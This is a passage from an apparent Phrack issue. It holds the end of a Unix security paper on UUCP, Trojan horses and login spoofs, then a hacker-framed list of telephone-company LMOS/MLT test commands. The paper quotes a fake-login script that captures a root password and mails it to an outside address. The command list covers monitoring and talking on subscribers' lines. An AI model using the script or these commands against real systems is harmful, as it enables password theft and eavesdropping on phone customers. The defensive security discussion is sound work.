  1521. up other systems; instead they are queued and the uucico program initiates the
  1522. remote processes.  The uucico program uses the file /usr/uucp/USERFILE to
  1523. determine what files a remote system may send or receive.  Checks for legal
  1524. files are the basis for security in USERFILE.  Thus the system administrator
  1525. should carefully control this file.
  1526.   In addition, USERFILE controls security between two Unix systems by allowing
  1527. a call-back flag to be set.  Therefore, some degree of security can be
  1528. achieved by requiring a system to check if the remote system is legal before a
  1529. call-back occurs.
  1530.   The last UUCP function is the uuxqt.  It controls the remote command
  1531. execution.  The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine
  1532. which commands will run in response to a remote execution request.  For
  1533. example, if one wishes to use the electronic mail feature, then the L.cmd file
  1534. will contain the line rmail.  Since uuxqt determines what commands will be
  1535. allowed to execute remotely, commands which may compromise system security
  1536. should not be included in L.cmd.
  1537.  
  1538. CALL THE UNIX SYSTEM
  1539.  
  1540. In addition to UUCP network commands, one should also be cautious of the cu
  1541. command (call the Unix system).  Cu permits a remote user to call another
  1542. computer system.  The problem with cu is that a user on a system with a weak
  1543. security can use cu to connect to a more secure system and then install a
  1544. Trojan horse on the stronger system.  It is apparent that cu should not be
  1545. used to go from a weaker system to a stronger one, and it is up to the system
  1546. administrator to ensure that this never occurs.
  1547.  
  1548. LOCAL AREA NETWORKS
  1549.  
  1550. With the increased number of computers operating under the Unix system, some
  1551. consideration must be given to local area networks (LANs).  Because LANs are
  1552. designed to transmit files between computers quickly, security has not been a
  1553. priority with many LANs, but there are secure LANs under development.  It is
  1554. the job of the system manager to investigate security risks when employing
  1555. LANs.
  1556.  
  1557. OTHER AREAS OF COMPROMISE
  1558.  
  1559. There are numerous methods used by hackers to gain entry into computer
  1560. systems.  In the Unix system, Trojan horses, spoofs and suids are the primary
  1561. weapons used by trespassers.
  1562.   Trojan horses are pieces of code or shell scripts which usually assume the
  1563. role of a common utility but when activated by an unsuspecting user performs
  1564. some unexpected task for the trespasser.  Among the many different Trojan
  1565. horses, it is the su masquerade that is the most dangerous to the Unix system.
  1566.   Recall that the /etc/passwd file is readable to others, and also contains
  1567. information about all users - even root users.  Consider what a hacker could
  1568. do if he were able to read this file and locate a root user with a writable
  1569. directory.  He might easily plant a fake su that would send the root password
  1570. back to the hacker.  A Trojan horse similar to this can often be avoided when
  1571. various security measures are followed, that is, an etc/passwd file with
  1572. limited read access, controlling writable directories, and the PATH variable
  1573. properly set.
  1574.   A spoof is basically a hoax that causes an unsuspecting victim to believe
  1575. that a masquerading computer function is actually a real system operation.  A
  1576. very popular spool in many computer systems is the terminal-login trap.  By
  1577. displaying a phoney login format, a hacker is able to capture the user's
  1578. password.
  1579.   Imagine that a root user has temporarily deserted his terminal.  A hacker
  1580. could quickly install a login process like the one described by Morris and
  1581. Grampp (7):
  1582.  
  1583.   echo -n "login:"
  1584.   read X
  1585.   stty -echo
  1586.   echo -n "password:"
  1587.   read Y
  1588.   echo ""
  1589.   stty echo
  1590.   echo %X%Y|mail outside|hacker&
  1591.   sleep 1
  1592.   echo Login incorrect
  1593.   stty 0>/dev/tty
  1594.  
  1595. We see that the password of the root user is mailed to the hacker who has
  1596. completely compromised the Unix system.  The fake terminal-login acts as if
  1597. the user has incorrectly entered the password.  It then transfers control over
  1598. to the stty process, thereby leaving no trace of its existence.
  1599.   Prevention of spoofs, like most security hazards, must begin with user
  1600. education.  But an immediate solution to security is sometimes needed before
  1601. education can be effected.  As for terminal-login spoofs, there are some
  1602. keyboard-locking programs that protect the login session while users are away
  1603. from their terminals.  (8, 10) These locked programs ignore keyboard-generated
  1604. interrupts and wait for the user to enter a password to resume the terminal
  1605. session.
  1606.   Since the suid mode has been previously examined in the password section, we
  1607. merely indicate some suid solutions here.  First, suid programs should be used
  1608. is there are no other alternatives.  Unrestrained suids or sgids can lead to
  1609. system compromise.  Second, a "restricted shell" should be given to a process
  1610. that escapes from a suid process to a child process.  The reason for this is
  1611. that a nonprivileged child process might inherit privileged files from its
  1612. parents.  Finally, suid files should be writable only by their owners,
  1613. otherwise others may have access to overwrite the file contents.
  1614.   It can be seen that by applying some basic security principles, a user can
  1615. avoid Trojan horses, spoofs and inappropriate suids.  There are several other
  1616. techniques used by hackers to compromise system security, but the use of good
  1617. judgement and user education may go far in preventing their occurrence.
  1618.  
  1619. CONCLUSION
  1620.  
  1621. Throughout this paper we have discussed conventional approaches to Unix system
  1622. security by way of practical file management, password protection, and
  1623. networking.  While it can be argued that user education is paramount in
  1624. maintaining Unix system security (11) factors in human error will promote some
  1625. degree of system insecurity.  Advances in protection mechanisms through
  1626. better-written software (12), centralized password control (13) and
  1627. identification devices may result in enhanced Unix system security.
  1628.   The question now asked applies to the future of Unix system operating.  Can
  1629. existing Unix systems accommodate the security requirements of government and
  1630. industry? It appears not, at least for governmental security projects.  By
  1631. following the Orange Book (14), a government graded classification of secure
  1632. computer systems, the Unix system is only as secure as the C1 criterion.  A C1
  1633. system, which has a low security rating (D being the lowest) provides only
  1634. discretionary security protection (DSP) against browsers or non-programmer
  1635. users. Clearly this is insufficient as far as defense or proprietary security
  1636. is concerned.  What is needed are fundamental changes to the Unix security
  1637. system.  This has been recognized by at least three companies, AT&T, Gould and
  1638. Honeywell (15, 16, 17).  Gould, in particular, has made vital changes to the
  1639. kernel and file system in order to produce a C2 rated Unix operating system.
  1640. To achieve this, however, they have had to sacrifice some of the portability
  1641. of the Unix system.  It is hoped that in the near future a Unix system with an
  1642. A1 classification will be realized, though not at the expense of losing its
  1643. valued portability.
  1644.  
  1645. REFERENCES
  1646.  
  1647. 1  Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986)
  1648.    pp 50-63
  1649. 2  Waite, M et al. "Unix system V primer" USA (1984)
  1650. 3  Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128
  1651. 4  Kowack, G and Healy, D "Can the holes be plugged?" Computerworld
  1652.    Vol 18 (26 September 1984) pp 27-28
  1653. 5  Farrow, R "Security issues and strategies for users" Unix/World
  1654.    (April 1986) pp 65-71
  1655. 6  Farrow, R "Security for superusers, or how to break the Unix system"
  1656.    Unix/World (May 1986) pp 65-70
  1657. 7  Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell
  1658.    Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672
  1659. 8  Wood, P H and Kochan, S G "Unix system security" USA (1985)
  1660. 9  Nowitz, D A "UUCP Implementation description:  Unix programmer's manual
  1661.    Sec. 2" AT&T Bell Laboratories, USA (1984)
  1662. 10 Thomas, R "Securing your terminal: two approaches" Unix/World
  1663.    (April 1986) pp 73-76
  1664. 11 Karpinski, D "Security round table (Part 1)" Unix Review
  1665.    (October 1984) p 48
  1666. 12 Karpinski, D "Security round table (Part 2)" Unix Review
  1667.    (October 1984) p 48
  1668. 13 Lobel, J "Foiling the system breakers:  computer security and access
  1669.    control" McGraw-Hill, USA (1986)
  1670. 14 National Computer Security Center "Department of Defense trusted
  1671.    computer system evaluation criteria" CSC-STD-001-83, USA (1983)
  1672. 15 Stewart, F "Implementing security under Unix" Systems&Software
  1673.    (February 1986)
  1674. 16 Schaffer, M and Walsh, G "Lock/ix:  An implementation of Unix for the
  1675.    Lock TCB" Proceedings of USENIX (1988)
  1676. 17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs,
  1677.    Government System Division, USA (August 1987)
  1678. ==============================================================================
  1679.  
  1680.                                ==Phrack Inc.==
  1681.  
  1682.                      Volume Two, Issue 18, Phile #8 of 11
  1683.  
  1684.                                   Control C
  1685.  
  1686.                                      and
  1687.  
  1688.                     The Tribunal of Knowledge presents...
  1689.  
  1690.                    LMOS (Loop Maintenance Operation System)
  1691.  
  1692.                              -A List of Commands-
  1693.  
  1694.     This file contains what to our knowledge are the best things to do on
  1695. LMOS.  We were really vague due to the great power of the information provided
  1696. in this file.  You now know the commands so we will not go into (either in
  1697. this file or when talking to us) how to use this information, it is up to you
  1698. to figure out how to use it.
  1699.  
  1700. +:  Increase the voice volume on a line
  1701.  
  1702. + lets you increase the volume when you are talking on or monitoring a
  1703. sub-scriber's line over a callback path.  The volume is increased because MLT
  1704. adds amplifier to the line.  + may be used after a mon, talk, rev, talkin or
  1705. call request.  Sometimes MLT adds an amplifier automatically to a long line.
  1706. You will not know it is there so if you try to add amplification, a + will
  1707. appear in the status sections but the voices will not get any louder because
  1708. they are already loud as possible.
  1709.  
  1710. -:  Decrease the voice volume on a line
  1711.  
  1712. - lets you decrease the volume when you are talking on or monitoring a
  1713. subscriber's line over a callback path.  The volume is decreased because MLT
  1714. removes amplifier from the line.  - may be used to remove amplifier that you
  1715. have placed on the line with the + request, or amplifier that MLT has
  1716. automatically places on a long line.  The main reason to remove the amplifier
  1717. is because it can sometimes cause a shrill or howl.
  1718.  
  1719. Call:  Make a call on a subscriber's line
  1720.  
  1721. Call lets you use your touch-tone pad to dial any number you want using the
  1722. customer's line circuit.  It does this by simulating an off-hook condition in
  1723. order to draw dial tone.  A callback number is a required entry on the tv mask
  1724. and an mdf access is required for calling out (except in SXS and panel
  1725. offices).  You can use a call when:  1) You want to know the TN for a known CA
  1726. & PR - you would call TSPS or ANI.  2) Calls cannot be completed to a TN - you
  1727. would call that TN.  3) To monitor dial tone on a customer's line.
  1728.  
  1729. Callrd:  Make a call on a dial pulse line circuit
  1730.  
  1731. Callrd lets you use your touch-tone pad to dial using the customer's rotary
  1732. dial line circuit.  MLT does this by translating tones on a customer's line.
  1733. mdf access is required for calling out (except in SXS, DMS10, DMS100, and
  1734. DMS100AC offices).  Use a callrd if you want to know the TN for a known CA &
  1735. PR - you would call TSPS or ANI.
  1736.  
  1737. Ccol:  Collect coins using coin relay
  1738.  
  1739. Ccol attempts to collect any coins that are in the hopper of a coin telephone
  1740. set by operating the coin relay.  Ccol does not check the totalizer or check
  1741. the rest of the line.  The results tell you only about relay operation, speed,
  1742. and the current that is necessary to operate it.  A ver code is not returned
  1743. by ccol.  You must have access to the line before your request ccol.  You will
  1744. use ccol most often when you are talking to a repair person who is trying to
  1745. fix a coin phone.
  1746.  
  1747. Channel:  Run enhanced channel tests on DLC lines
  1748.  
  1749. Chan or channel runs channel isolation tests and tells you if you have a bad
  1750. COT or RT channel unit.  Use this request to run enhanced channel tests on
  1751. lines served by digital loop carriers such as SLC Series 5.  Chan can only be
  1752. run if there is special equipment in the co you're testing in.  If you are
  1753. testing a non-locally switched line with the SSA request, channel tests must
  1754. be run separately with this request.  Chan may also be used to run channel
  1755. isolation tests on switched lines from the tv or stv mask, but these tests are
  1756. included when you do a full or loop on a switched line.
  1757.  
  1758. Change:  Change status information
  1759.  
  1760. Change allows you to change cable, pair or comment information that is
  1761. displayed without having to request a test or any other type of information.
  1762. the permanent line record information is not changed.  To request a change,
  1763. enter "change" in the req field of the tv and enter the change of information.
  1764.  
  1765. Chome:  Home totalizer on a coin telephone
  1766.  
  1767. Chome attempts to return a totalizer to the starting position (home) for
  1768. counting coins.  The totalizer counts the coins and sends a tone back to the
  1769. co for every 5 cents deposited.  If it is not homed, coins can't be deposited.
  1770. A chome request tells you whether the totalizer was homed, how many tones were
  1771. sent to the co, and the current that was used to home the totalizer.  A line
  1772. must already be accessed to request a chome.  Chome is often used when a
  1773. repair person is trying to fix a coin telephone.
  1774.  
  1775. Co:  Test the central office equipment
  1776.  
  1777. Co initiates a series of tests on the subscriber's line circuit.  Co can be
  1778. requested using either a no-test or an MDF trunk.  A no-test access connects
  1779. you to the entire loop but a co request tests only the inside portion.  An MDF
  1780. access is only connected to the inside portion of the loop.  The outside
  1781. portion is physically disconnected.  Use a no-test access when you are fairly
  1782. sure the trouble is inside the central office.  Use a co on an MDF access when
  1783. you are not sure where the trouble is.
  1784.  
  1785. Coin:  Test a coin telephone set
  1786.  
  1787. Coin initiates a full series of tests on a telephone line.  The station set,
  1788. the totalizer, the coin relay, the loop and the co equipment are checked.  If
  1789. the coin request finds something wrong with either the totalizer or the relay,
  1790. it stops testing and tells you the trouble is in the set.  If it finds nothing
  1791. wrong, it runs the full entries of tests.  Coin may be used when a repair
  1792. person is trying to fix a coin telephone.  If a coin phone is newly installed,
  1793. coin will check the set even though there is no line record.
  1794.  
  1795. Cret:  Operate coin relay to return coins
  1796.  
  1797. Cret attempts to return any coins that may be lodged in the hopper of a coin
  1798. telephone set.  It operates the coin relay so that it will return the coins.
  1799. It tries to return them 3 times before giving up.  If it is successful, it
  1800. also checks the speed of the relay.  It does not check the totalizer or the
  1801. rest of the line.  You should have access to the line before you request a
  1802. cret.  You will use cret primarily when you are talking to a repair person who
  1803. is trying to repair coin telephone.
  1804.  
  1805. Cset:  Check totalizer and relay in coinset
  1806.  
  1807. Cset checks the totalizer and the coin relay in a coin telephone set.  The
  1808. totalizer is the mechanism in the phone that counts deposited coins and sends
  1809. a tone back to the co for every 5 cents that is deposited.  The relay is the
  1810. mechanism that either returns or collects the coins that are deposited.  Cset
  1811. does not check the co or loop parts of the line.  Cset can be used when you
  1812. are talking to a repair person who is fixing a coin telephone.
  1813.  
  1814. Dial:  Test a subscriber's rotary dial
  1815.  
  1816. Dial checks the subscriber's rotary dial.  You must be in contact with the
  1817. subscriber,either over a callback path or over a ddd line.  For the dial
  1818. request to work correctly, tell the subscriber to dial a "0" after hearing
  1819. brief dial tone.  The results of a dial request tell you whether the dial is
  1820. okay or not, whether the dial speed is okay and what the speed is, and whether
  1821. the break is okay and what the break is.  Use the dial request when you
  1822. suspect a problem with the telephone set.  The trouble report could be "Can't
  1823. call out' or 'Gets wrong numbers", for example.
  1824.  
  1825. Dtout:  Test a pbx line circuit
  1826.  
  1827. Dtout initiates a series of tests on a pbx line circuit.  Dtout must be
  1828. requested using an MDF trunk.  It is used to draw dial tone and check the
  1829. arrangement of the pbx line circuit.  Use dtout when you need to check the
  1830. condition of special service circuits that do not use central office switches.
  1831.  
  1832. Full:  Test the entire telephone line
  1833.  
  1834. Full starts a series of tests that do an extensive analysis of the entire
  1835. line. This includes both the inside and outside portions.  Many individual
  1836. tests are run and the most important results are displayed in the summary
  1837. message. Outside, MLT checks for AC and DC faults.  Inside, it checks the line
  1838. circuit and dial tone.  The results may also include many other types of
  1839. information about the line.  You might request full line test when you first
  1840. access a line or when you need to know a lot about a line.
  1841.  
  1842. Grm:  Get fast ground resistance measurement
  1843.  
  1844. Grm gives you a quick measurement of the DC resistance of the ground path from
  1845. the strap to the test hardware.  Before you do a grm, have the repair person
  1846. strap the tip and ring wires to ground.  If this isn't done, grm will give you
  1847. incorrect values.  The line must be accessed before you do a grm request.  You
  1848. can use grm when you are talking to a repair person who is fixing a coinset.
  1849. The resistance values obtained from a grm can be compared to old resistance
  1850. values that are stored inside each coinset.
  1851.  
  1852. Help:  List the valid tv requests
  1853.  
  1854. Help returns a list of all of the valid requests used in MLT-2.  Help can be
  1855. used when you are not sure which request to use in a particular situation, or
  1856. when you can't remember an exact request name.  For example, the correct entry
  1857. to reverse polarity on a touch-tone line is "Rev.", help will tell you this.
  1858. For a description of any specific request, enter the name of the request
  1859. followed by a question mark.
  1860.  
  1861. Info:  Get general information about a line
  1862.  
  1863. Info gives you the wire center name and the location of the frame; the
  1864. exchange key, MDF group and MDF trunk numbers associated with the subscriber's
  1865. line; the telephone number at the appropriate frame; and the assignment
  1866. telephone number. You can get information about a whole telephone number, an
  1867. NPA-NXX-, or an exchange key.  MLT does not access the line when you request
  1868. info, but it keeps access if you already have it.  If there are multiple
  1869. frames in an office, MLT give you information about all of them.
  1870.  
  1871. Keep:  Keep an access that you already have
  1872.  
  1873. Keep lets you hold access to a no-test or MDF trunk that is about to
  1874. "timeout."  MLT keeps track of which trunks you have accessed but have not
  1875. used for a while.  MLT will automatically drop the access for you after a
  1876. certain period of time.  About 2 minutes before dropping the access, MLT gives
  1877. you a warning message and also highlights the status line that will be
  1878. dropped.  If you want to keep the access, you should enter "keep" in the req
  1879. field and the tn or line number of the access to be held.  To drop an access
  1880. when your are finished with it, enter an x in the req field.
  1881.  
  1882. Lin:  Test the inside part of the loop
  1883.  
  1884. Lin starts a series of tests on the inside portion of a line.  Lin includes
  1885. the same tests as the loop test and can identify a co line circuit if one is
  1886. present.  Lin does not do the regular line circuit and draw and break dial
  1887. tone tests.  An MDF access is required for a lin request.  You can use lin to
  1888. test special circuit that do not use co switching machine.  For example, if
  1889. the circuit has 2 loops connected at the frame, lin lets you look at the
  1890. second loop (both full and loop only test toward one loop).
  1891.  
  1892. Lloop:  Run the long loop analysis on the outside or loop part of a line
  1893.  
  1894. The ll request starts a series of tests which do extensive analysis of the
  1895. outside portion of the subscriber's line.  It is specifically designed to
  1896. handle cases that the regular loop request was not designed to handle.  These
  1897. cases include very long loops (over 100,000 feet) and multiparty lines on
  1898. moderate-to-very-long loops.  It does similar measurements to those that loop
  1899. does, but analyzes the results differently.  It expects to see a loop that has
  1900. no dc faults or only very light dc faults.  If you use a loop on lloop on a
  1901. loop that has serious dc faults it will not do the long loop analysis.
  1902.  
  1903. Loc1:  Measure distance to 1-sided resistive fault
  1904.  
  1905. Loc1 gets MLT to measure how far a one-sided fault is from the repair person,
  1906. because telephone lines can be very long, it can be difficult for a repair
  1907. person to find the location of a resistive fault.  You can use loc1 to help
  1908. the repair person have 1-sided fault.  You should be in contact with the
  1909. repair person on a line other than the one being measured.  Have the repair
  1910. person open the pr at a ready-access point beyond the fault if possible.  Ask
  1911. him/her to strap the pr tip to ring.  Remember to enter a temperature on the
  1912. tv mask before you transmit the loc1 request.
  1913.  
  1914. Loc2:  Measure distance to 2-sided resistive fault
  1915.  
  1916. Loc2 gets MLT to measure how far a two-sided fault is from the repair person.
  1917. Remember that you must run a locgp before you run a loc2 and that you must be
  1918. in contact with the repair-person on a line other than the one you will be
  1919. measuring.  The repair-person must connect the bad pair to the good pair in a
  1920. specific way, the exact method to use is explained in the results of the locgp
  1921. request.  Logcp and loc2 can also be used to sectionalize a one-sided
  1922. resistive fault.  Remember to enter a temperature on the tv mask before you
  1923. transmit the loc2 request.
  1924.  
  1925. Look:  Look for an intentional fault
  1926.  
  1927. Look is used to identify a fault, usually a short or ground, that has been
  1928. placed on the line by the repair person.  Look can be used when a repair
  1929. person is having trouble locating a particular line.  Look gets MLT to monitor
  1930. the line that the repair person is looking for.  When the repair person shorts
  1931. or grounds the line, mlt sends a tone to you over your headset.  You can tell
  1932. the repair person that you "see the short".  A callback path is required for a
  1933. look request.  You should talk to the repair person on a line other than the
  1934. one you are working on.
  1935.  
  1936. Lookin:  Look for an intentional fault on a special services line
  1937.  
  1938. Lookin is used to identify a fault, usually a short or ground, that has been
  1939. placed on the special services line by the technician.  Lookin is used to
  1940. locate a particular line by having MLT monitor the line that the repair person
  1941. is looking for.  When the repair person shorts or grounds the line, MLT sends
  1942. a tone to you over your headset.  You can tell the repair person that you "See
  1943. the short."  A callback path is required for a lookin quest.  You should talk
  1944. to the repair person on a line other than the one you are working on.  MDF
  1945. access is required.
  1946.  
  1947. Loop:  Test the outside part of the loop
  1948.  
  1949. Loop starts a series of tests that do an extensive analysis of the outside
  1950. portion of the line.  Loop does every test that full does except the line
  1951. circuit and draw and break dial tone tests.  Loop can be requested using
  1952. either a no-test or an MDF trunk.  A no-test access connects you to the entire
  1953. line but a loop request tests only the outside portion.  An MDF access is only
  1954. connect to the outside portion.  Use a no-test trunk when you are fairly sure
  1955. the trouble is out of the co and an MDF when you are not sure.
  1956.  
  1957. Lrm:  Get fast loop resistance measurement
  1958.  
  1959. lrm gives you a quick measurement of the DC resistance on a line.  Lrm can't
  1960. be run unless either the receiver is off-hook or the line is strapped tip to
  1961. ring (an intentional short is placed on the line by the repair person).  Also,
  1962. MLT will not accept an lrm request if there is a hard ground on the line.  Lrm
  1963. does not access the line so you must already have access to do an lrm.  You
  1964. can use lrm when you are talking to a repair person who is fixing a coinset.
  1965. The resistance values obtained from the lrm can be compared to the old
  1966. resistance values that are stored inside each coinset.
  1967.  
  1968. MDF(#):  Access a specific MDF trunk
  1969.  
  1970. MDF(#) lets you choose the MDF trunk that you want MLT to access.  Use this
  1971. request when an MDF trunk is connected to a telephone line at the MDF but is
  1972. not connected to the loop testing system.  This may occur in small offices
  1973. where the frame attendant doesn't work for the entire day.  You can also use
  1974. this request when an MDF trunk has to be tested and repaired.  The MDF entry
  1975. must be a five character entry consisting of the wire center identifier and
  1976. the trunk number.
  1977.  
  1978. Mdf:  Access a main distributing frame (MDF)
  1979.  
  1980. MDF connects the mlt testing equipment to an MDF trunk.  Before you can enter
  1981. any requests, you must have the frame attendant connect the MDF trunk to the
  1982. subscriber's line.  Remember that MLT automatically accesses a no-test trunk
  1983. unless you specifically request an MDF trunk.  An MDF trunk goes directly from
  1984. the loop testing system to the main distributing frame.  Bypassing the central
  1985. office switch.  Using an MDF trunk allows you to test loops that are connect
  1986. to co equipment that is not MLT-testable.  Also, you can sectionalize a fault
  1987. in or out of the co by testing "in" or "out" using MDF.
  1988.  
  1989. MDF(gr):  Access a trunk from a certain mdf trunk group
  1990.  
  1991. MDF(gr) lets you choose the MDF trunk group from which MLT will choose an MDF
  1992. trunk.  Use the MDF(gr) request when the NPA-NXX that you are using has more
  1993. than one frame associated with it and you can't enter cable and pair numbers.
  1994. For example, to request MDF trunk group a, you should enter MDFA in the req
  1995. field.  To find out which trunk groups are available for your NPA-NXX you can
  1996. either enter an mdf or an info request.  Remember that you still have to call
  1997. the frame attendant to have the trunk and line connected and also disconnect
  1998. when you are finished.
  1999.  
  2000. Mdfin:  Test the inside part of a line
  2001.  
  2002. Mdfin starts a series of tests that do an extensive analysis of the inside
  2003. line.  This includes line circuit and dial tone tests.  The mdfin request uses
  2004. a special line that runs from the MLT testing equipment to the MDF.  You must
  2005. ask the frame attendant to connect this line to the subscriber's line.  Then
  2006. you must enter the telephone number of this special line on the test mask
  2007. along with mdfin and the subscriber's number.  For more information see the
  2008. mdfio module in the MLT-2 user guide.
  2009.  
  2010. Mdfout:  Test the outside part of a line
  2011.  
  2012. Mdfout starts a series of tests that do an extensive analysis of the outside
  2013. line.  This includes the DC and AC tests.  The mdfout request uses a special
  2014. line that runs from the mlt testing equipment to the MDF.  You must ask the
  2015. frame attendant to connect this line to the subscriber's line.  Then you must
  2016. enter the telephone number of this special line on the test mask along with
  2017. mdfin and the subscriber's number.
  2018.  
  2019. Mon:  Monitor a subscriber's line
  2020.  
  2021. Mon lets you monitor a subscriber's line.  Sometimes you are a better judge of
  2022. whether there is noise, speech, or a recording on a line than MLT is.  If you
  2023. want to listen to a line to determine if one of these conditions does exist,
  2024. use the mon request.  You can also be automatically placed in the monitor mode
  2025. by MLT in some cases.  You will be put in monitor mode if you request ring,
  2026. talk or psr but MLT thinks the line is busy, or if you must talk to the
  2027. subscriber to run a rev, dial, or tt.  A callback number is required.  You can
  2028. request quick, look, or full while in monitor mode.
  2029.  
  2030. Psr:  Release a permanent signal
  2031.  
  2032. Psr attempts to release a permanent signal in a step-by-step central office.
  2033. A permanent signal is a steady dial tone on a line.  A frequent cause is a
  2034. receiver that is off-hook.  Psr lets you remove the permanent signal so that
  2035. you can monitor for room noise.  If when you monitor the line you still hear
  2036. steady dial tone, you should suspect permanent signal on the line.  Psr
  2037. requires a callback path between your callback line and the subscriber's line.
  2038. You should already have the callback path established before you enter a psr
  2039. request.
  2040.  
  2041. Qin:  Run a quick series in toward the co
  2042.  
  2043. Qin starts a series of tests that make a "quick" check of the loop toward the
  2044. central office.  It includes the same tests as quick.  It can also identify a
  2045. co line circuit if one is present and will report a line circuit if the DC
  2046. resistances look like one is present.  An MDF access is required for a qin
  2047. request.  You can use qin to test special switching machines.  For example, if
  2048. the circuit has 2 loops connected at the frame, qin lets you look at the 2nd
  2049. loop (both full & loop only test toward one loop).
  2050.  
  2051. Rev:  Identify touch-tone polarity reversals
  2052.  
  2053. Rev helps you identify a touch-tone polarity reversal.  On a good line, the
  2054. battery is connected to the ring wire and the ground is on the tip wire.
  2055. These wires must be connected to specific terminals on the telephone.  If they
  2056. are reversed, the subscriber will be able to receive calls but will not be
  2057. able to dial out.  If the line is reversed, you won't be able to hear the
  2058. tones before you enter a rev request.  Rev only reserves the line temporarily.
  2059. A callback path should be established before you make a rev request.
  2060.  
  2061. Rin:  Ring a subscriber's special services line
  2062.  
  2063. Rin lets you ring a telephone on a special services line.  A callback is
  2064. required.  If one doesn't exist, ring in sets one up for you.  To answer the
  2065. callback, answer its ring and press "0" on the touch-tone pad, and listen for
  2066. ringing.  When the subscriber answers, you will be placed in talk mode.  If
  2067. the line is busy, the call in progress will be interrupted.  Use rin to
  2068. contact the subscriber or a technician at the subscriber's home.  MDF access
  2069. is required to request rin.
  2070.  
  2071. Ring(#):  Ring a specific party on a multi-party line
  2072.  
  2073. Ring(#) lets you choose the telephone that you want to ring on a multiparty
  2074. line.  A multiparty line is one on which more than one subscriber is connected
  2075. to the same pair of wires.  Normally MLT checks the line records of the
  2076. telephone number you enter using the ring request, and automatically rings the
  2077. correct party.  When the line records indicate 2, 4, or 8 party, use the
  2078. ring(#) request and specify the party number in place of the "#."  If you
  2079. request ring1, MLT rings the party connected to the ring side.  If you request
  2080. ring2, MLT rings the party connected on the tip side.
  2081.  
  2082. Ring:  Ring a subscriber's line
  2083.  
  2084. Ring lets you ring a telephone on a single party line.  A callback path is
  2085. required but if one doesn't exist, ring sets one up for you.  To answer your
  2086. callback, answer its ring and press "0" on the touch-tone pad, and listen for
  2087. ringing.  When the subscriber answers, you will be placed in talk mode.  If
  2088. the line is busy or cannot be rung, you will be placed in monitor mode to
  2089. listen for noise or speech.  Use ring to contact the subscriber or a repair
  2090. person at the subscriber's home.
  2091.  
  2092. Ringer:  Check ringer configuration on a line
  2093.  
  2094. Ringer counts the number of ringers on each part of the loop (tip-ring,
  2095. tip-ground, and ring-ground).  The results tell you the number of telephones
  2096. found by MLT.  If there is a problem, the summary explains the problem.  If
  2097. you are testing a party line, some of the ringers found may belong to the
  2098. other party.
  2099.  
  2100. Rin:  Ring a subscriber's special services line
  2101.  
  2102. Rin lets you ring a telephone on a special services line.  A callback is
  2103. required.  If one doesn't exist, ring-in sets one up for you.  To answer the
  2104. callback, answer its ring and press "0" on the touch-tone pad, and listen for
  2105. ringing.  When the subscriber answers, you will be placed in talk mode.  If
  2106. the line is busy the call in progress will be interrupted.  Listen for noise
  2107. of speech.  Use rin to contact the subscriber or a technician at the
  2108. subscriber's home.  MDS is required to request rin.
  2109.  
  2110. Soak:  Identify swinging resistance condition
  2111.  
  2112. Soak identifies unstable ground faults (swinging resistance) on a line.
  2113. Voltage is applied to the line and a series of DC resistance measurements are
  2114. made to see the effect of that voltage.  If the resistance values are all low,
  2115. the fault is probably stable.  If even one value is 20% larger than the
  2116. original measurement, the fault may be unstable (swinging).  A repair person
  2117. who is dispatched may have trouble locating a swinging fault.  Use soak when
  2118. you find a 10-1000 kohm ground on a q test (full & loop include the soak
  2119. test), or just prior to dispatch to double-check a line's condition.
  2120.  
  2121. Ssa:  Special services access
  2122.  
  2123. The ssa request is used to access non-locally switched customer telephone
  2124. lines.  Accessing these lines is a  special case of a no-test trunk access.
  2125. However, if they go through a digital loop carrier such as SLC Series 5, and
  2126. there is special equipment available in the co, then you can test them with a
  2127. no-test trunk special se rvices access.  This means you don't have to call the
  2128. trunk.  The request can only be run from the stv mask.
  2129.  
  2130. Stv:  Special services trouble verification request
  2131.  
  2132. The stv request changes you from a tv mask to an stv mask.  Stv is used when
  2133. you need to test special services circuits (non-locally switched lines) served
  2134. by digital loop carrier systems such as SLC Series 5.  Switching to the stv
  2135. mask will not affect any information you left in the tv mask -- your status
  2136. lines will remain the same; however, the middle section of the mask will be
  2137. changed. Any request done from a tv mask can also be done from an stv mask,
  2138. but not vice versa.  The stv request can only be run from a tv mask.
  2139.  
  2140. Take:  Take control of a long-term access
  2141.  
  2142. Take is used when you want to transfer a long-term access from someone else's
  2143. terminal to your terminal.  To take control of a no-test access, enter the
  2144. telephone number that you want to transfer in the tn field.  To transfer an
  2145. MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF
  2146. number in the space to the right of the regular tn field of the tv mask.
  2147. Finally, enter take in the req field.  If the previous holder had a callback
  2148. established, it would not be remover.  If necessary, you must remove the
  2149. callback using xcb and request a new callback to your telephone.
  2150.  
  2151. Talk:  Talk over the subscriber's line
  2152.  
  2153. Talk lets you talk to either a subscriber or a repair person on a subscriber's
  2154. line.  Talk does not ring the line so there must be someone waiting to talk to
  2155. you on the other end of the line.  A callback path is required for the talk
  2156. request but if one does not already exist, talk will set one up for you if you
  2157. have a callback number entered.  If the line is already accessed before the
  2158. talk request, MLT enters a "t" and the last 2 digits of the callback number
  2159. under the callback heading and updates the time since access.  You can request
  2160. quick, loop, or full while in talk mode.
  2161.  
  2162. Talkin:  Talk over the subscriber's special services line
  2163.  
  2164. Talkin lets you talk to a subscriber or a repair person on a special services
  2165. line.  Talkin does not ring the line so there must be someone waiting to talk
  2166. to you on the other end of the line.  A callback path is required for the
  2167. talkin request but if one does not already exist, talkin sets one up for you
  2168. if you have a callback number entered.  If the line is already accessed before
  2169. the talkin request, MLT enters a "t" and the last 2 digits of the callback
  2170. number under the callback heading and updates the time since access.  You must
  2171. have an MDF access to request talkin.
  2172.  
  2173. Tone+:  Use loud tone to help identify a pair
  2174.  
  2175. Tone+ puts a high amplitude tone on a line.  It is used on pairs that are very
  2176. long.  The extra amplitude helps the repair-person hear the tone over long
  2177. distances.  Tone is used to help a repair person to locate the correct pair in
  2178. a cable with many pairs of wires in it.  Use tone+ when a repair person
  2179. requests a tone on a very long pair.  If you have a callback on the line, it
  2180. will be placed in monitor mode.  If the status line gets brighter & you get a
  2181. changed state message, it means 1) The repair person found the pr & wants to
  2182. talk to you or 2) The subscriber has gone off-hook.
  2183.  
  2184. Tone:  Use tone to help craft identify a pair
